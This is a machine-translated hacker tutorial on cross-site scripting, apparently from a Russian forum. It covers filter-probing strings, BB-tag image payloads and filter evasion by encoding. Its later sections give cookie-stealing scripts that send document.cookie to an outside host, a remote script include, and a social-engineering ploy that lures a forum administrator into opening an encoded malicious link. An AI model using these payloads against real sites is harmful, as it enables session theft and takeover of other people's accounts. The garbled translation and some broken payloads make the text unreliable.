This page has been robot translated, sorry for typos if any. Original content here.

Description Xss from A to Z.



  • Xss is Css => Cross Site Scripting
  • How to use XSS
  • What is an XSS attack?
  • What is passive and active XSS?
  • So, I'll go specifically to how to find in this site XSS.
  • And how to determine if there is a filter or not?
  • Active XSS
  • We kept doing type codes all the time
  • How can I substitute it for a link with Xss?


  • Xss is Css => Cross Site Scripting

    Not to be confused with CSS is also called XSS
    For the first time this BAG appeared in 1997.



    How to use XSS.


    First we need to know what a cookie is.
    If you know, you can skip.

    Cookies are used to store site credentials on the visitor's computer.
    If you registered on the site under the nickname 'blabluble', the site has saved a file with cookies on your computer, where your data is encoded.
    And if you have an administrator and you have access to the site, and I am a user who stole from you (admin) cookies, then I can safely go to the site, and the site defines me as 'admin' - I will have administrator rights.

    To change (substitute stolen) cook I advise you to use CookieEdit for IE or built-in functions in Opera and Firefox.

    To intercept cookies, you need to find a place on the site where you can perform an XSS attack.


    What is an XSS attack?


    XSS attacks are attacks not on the site itself, but on users of the site.
    XSS is a flaw in the filter, application.

    There are passive XSS and active XSS.

    What is passive and active XSS?


    Passive - this Xss, which require the victim to participate directly + there are specific limitations and difficulties.
    Therefore, passive XSS is not very appreciated.
    For example, you need to make it pass through a poisonous link, which will require social engineering, cunning.

    Active - this XSS, which does not require any additional action from the victim - it is enough just to open the page with your XSS and the Java code will be executed automatically.
    Thanks to their automation - they are very useful and valuable.
    For example, active xss exists in BB tags because of insufficient filtering, when you leave a message on the forum \ guestbook \ chat, which will always be active with each update.




    So, I'll go specifically to how to find in this site XSS.


    As I wrote earlier that XSS consists of tags, they also consist of html, and javascript =).

    Javascript can be entered in html.
    Can be encoded to bypass filters. But more on that later.

    How do you know that XSS on a given site is going through?
    Horrible freakiness of type
    <script> alert () </ script> We try to insert this script into all the different fields ... if a message has been output, the script has been processed and executed.

    The most common XSS (observed in all places where bad filtering):

    "> <script> alert () </ script>

    The whole point is "> .

    Let's think about what we do when we type in the "> <script> alert () </ script> field, what happens?

    We enter a variable in the form "> <script> alert () </ script> of a variable." The variable is processed, "> executes, closes

    script and invokes <script> alert () </ script>

    This XSS is the most popular in search engines:

    We scan all the fields of the site and try to insert "> <script> alert () </ script>
    If the message came out - you found XSS ...




    And how to determine if there is a filter or not?


    Just in any field, enter: '';! - "<########> = & {()}
    Next, open the html page and look for the word "########"
    and see the subsequent sivoli ..

    If <> this is the first sign of the vulnerability, then the filter has a hole.
    If , "\ \ characters are the same as they were entered - this is the second sign of the vulnerability - possible additional characters for the subsequent XSS attack.
    Then, if you opened HTML, you did not find <> then most likely a hole in the filter.
    If you open HTML, you find that <> is replaced with other characters, then this is a bummer - a filter at
    it functions normally.
    It is also possible to enter the following in the field to check the filtering: "> <> '" `, / \? @%

    Consider the case if the filter eats <>

    In this case there is a hole probability.
    For example, the filter has the condition to eat <script>, <> and.
    Then try <zxcvb script: alert ();

    The filter looks that nothing is dangerous in <IMG% 20SRC = "java script: alert (); no, it closes and thereby
    executing the script.

    Of course, if the filter does not filter different encodings, you can try to encode the script and insert the code.

    All you have to try and find ...
    Try to enter in the fields and carefully review what we got from the filter.
    The method of tyke to understand how the filter works, whether it has any flaws.
    If the filter is bad, we can always insert scripts.




    Active XSS


    Here it is necessary to use the allowed tags and to hide them, you need to execute the query.

    For example, tags url, bb, img.
    The whole point of insertion is that we need to embed the query into the img or url parity. Img has many parameters except src and alt.
    This bug is very often used on the forum, in guestbooks ...

    Consider active XSS.

    Warnings !!!

    Tags [fon * t], [im * g], [ur * l] are written with * to ensure that they do not merge with the site code.
    To use these tags, delete * .

    For example, review the forum for the use of tags [fon * t], [im * g], [ur * l] and try to insert a script in them or combine them:

    [im * g] httr: //www.qwewqw.ru/1.jpg [/ im * g] There is a cross ... means img is used and we picked it up (it's just that there is img enabled, and admins from creating a message it is removed, they say pictures can not be inserted and it can be used
    different forms) if there is no cross ... and the entire inscription hangs, then try this:
    [im * g src = httr: //www.qwewqw.ru/1.jpg]

    Well, for example, we have achieved a cross by this:
    [im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]

    Let's check if the filter holds a space, add a space after the extension jpg:
    [im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]
    if there is a cross - then everything is OK.

    Further there are img parameters dynsrc and lowsrc that hold javascript. We try to insert for example:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
    check, send - send a message - it means you found the active XSS and instead of alert () you can insert any script.

    If the filter does not give up try this:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
    and
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = java script: alert () / 1.jpg [/ im * g]

    If, from the above examples, a cross is obtained, then httr: //www.qweqw.ru/1.jpg is replaced with the address of the sniffer.

    There are times when jpg is disabled by the admin.




    We kept making codes like:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    But they did not bring any benefit, these are just the codes for testing (testing) on ​​Xss.

    Here's the script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    He already steals cookies =)




    How can I substitute it for a link with Xss?


    Yes, very easy ...
    There are several options:

    - 1) we do this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> where **** the site with Xss.

    Here is the compiled script:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can still do this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http: // haknet .h16.ru / script / js.js

    and in js.js there are:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; this method is more reliable.

    But as I already wrote - sometimes there are difficulties with filters on the site (our script does not roll).
    Then you need to think about how to get around it.
    You can just add something, change something, or delete it in the script.
    But there is a more reliable option when we just encode the script. For this, there are many progs.
    There is such a site as http://ha.ckers.org/xss.html (encoder-decoder).

    Here is an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    it was coded:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Especially encryption is necessary not only to deceive filters, but also to deceive ADMIN when using passive CSU.

    Here is an example based on social engineering.
    We are looking for contact with the forum administrator, we throw him a link to his site in his forum, and he says "so cool feature is on the site" and so far in the same spirit.
    And on our site will be like you already guessed =) here is the script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do you ask me? )) .. This is Java code, which without a request passes to the specified site. So cho, we get, we gave the link to the admin, and he went to our site, that's what is done .. he quickly throws on

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this already is our Xss in encrypted form.

    Note: this will only work when Xss will belong to the site administrator to whom you dropped the link ...
    In other words, the DIFFICULTY OF PASSIVE CSU is that vulnerability can be used ONLY if the victim is AUTHORIZED on a vulnerable site !!!